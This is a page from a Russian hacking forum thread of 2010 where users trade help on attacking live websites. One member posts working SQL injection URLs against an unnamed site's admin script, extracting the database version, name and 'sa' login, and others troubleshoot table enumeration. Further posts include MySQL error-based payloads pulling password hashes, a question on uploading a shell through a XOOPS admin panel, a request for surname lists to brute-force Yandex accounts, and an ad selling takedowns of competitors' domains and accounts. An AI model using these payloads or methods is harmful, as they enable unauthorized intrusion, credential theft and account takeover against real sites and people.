Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1288 из 2422

1288

Опции темы

Поиск в этой теме

Опции просмотра

13.05.2010, 22:42

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

уже узнали спасибо

𝕏 Twitter Reddit Telegram Копировать ссылку

14.05.2010, 01:46

br1tva

Познающий

Регистрация: 26.12.2007

Сообщений: 38

С нами: 9671107

Репутация: 8

Значит есть один уязвимый веб ресурс 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' . нашёл значит уязвимый скрипт ,вывел версию :admin/complaintHandler.asp?id=1+or+1=@@version
Имя Базы Данных текущего юзера: admin/complaintHandler.asp?id=1%20or%201=(select%20db_na me())
Имя юзера владельца данной базой: admin/complaintHandler.asp?id=1%20or%201=(select%20syste m_user)-- = 'sa'

Вроде всё окей и всё выводится , но вот когда создаю запрос :
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- то в ответ получаю Record not found: 1 or 1=1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

Зато когда создаю запрос : admin/complaintHandler.asp?id=1+or+1=(SELECT+TOP+1+colum n_NAME+FROM+INFORMATION_SCHEMA.columnS)-- колонки выводятся на ура !

Кто знает почему table_name не выводятся а с column_name всё впорядке ??

14.05.2010, 01:56

BrainDeaD

Постоянный

Регистрация: 09.06.2005

Сообщений: 531

С нами: 11010660

Репутация: 439

может это лишнее?
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

14.05.2010, 02:04

br1tva

Познающий

Регистрация: 26.12.2007

Сообщений: 38

С нами: 9671107

Репутация: 8

Цитата:

Сообщение от BrainDeaD

может это лишнее?
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

При запросе: admin/complaintHandler.asp?id=1 (SELECT+%20TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES)-- получаю Microsoft OLE DB Provider for SQL Server error '80040e14'

sp_cursoropen/sp_cursorprepare: The statement parameter can only be a single select or a single stored procedure.

14.05.2010, 02:11

BrainDeaD

Постоянный

Регистрация: 09.06.2005

Сообщений: 531

С нами: 11010660

Репутация: 439

на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

14.05.2010, 02:13

br1tva

Познающий

Регистрация: 26.12.2007

Сообщений: 38

С нами: 9671107

Репутация: 8

Цитата:

Сообщение от BrainDeaD

на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

((

14.05.2010, 13:51

ReckouNT

Новичок

Регистрация: 16.01.2009

Сообщений: 17

С нами: 9114129

Репутация: 2

Народ, есть ли у кого база фамилий в женском склонении для брута? (Девичья фамилия матери)
Возможно ли побрутить яндекс этими фамилиями?

14.05.2010, 15:59

SENIA

Постоянный

Регистрация: 22.11.2008

Сообщений: 344

С нами: 9192645

Репутация: 570

Есть админка XOOPS cms. как залить шелл?
На форуме ничего путевого не нашел.

14.05.2010, 16:46

DrakonHaSh

Познающий

Регистрация: 16.04.2008

Сообщений: 88

С нами: 9509918

Репутация: 30

парочка общих вопросов накопилась

1. по mysql:
1a.

Код:

+or(1,1)=select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b.

Код:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a

как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

Код:

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?

Последний раз редактировалось DrakonHaSh; 14.05.2010 в 16:50..

#10

14.05.2010, 18:25

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

С нами: 8603287

Репутация: 87

DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html

Страница 1288 из 2422

1288

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57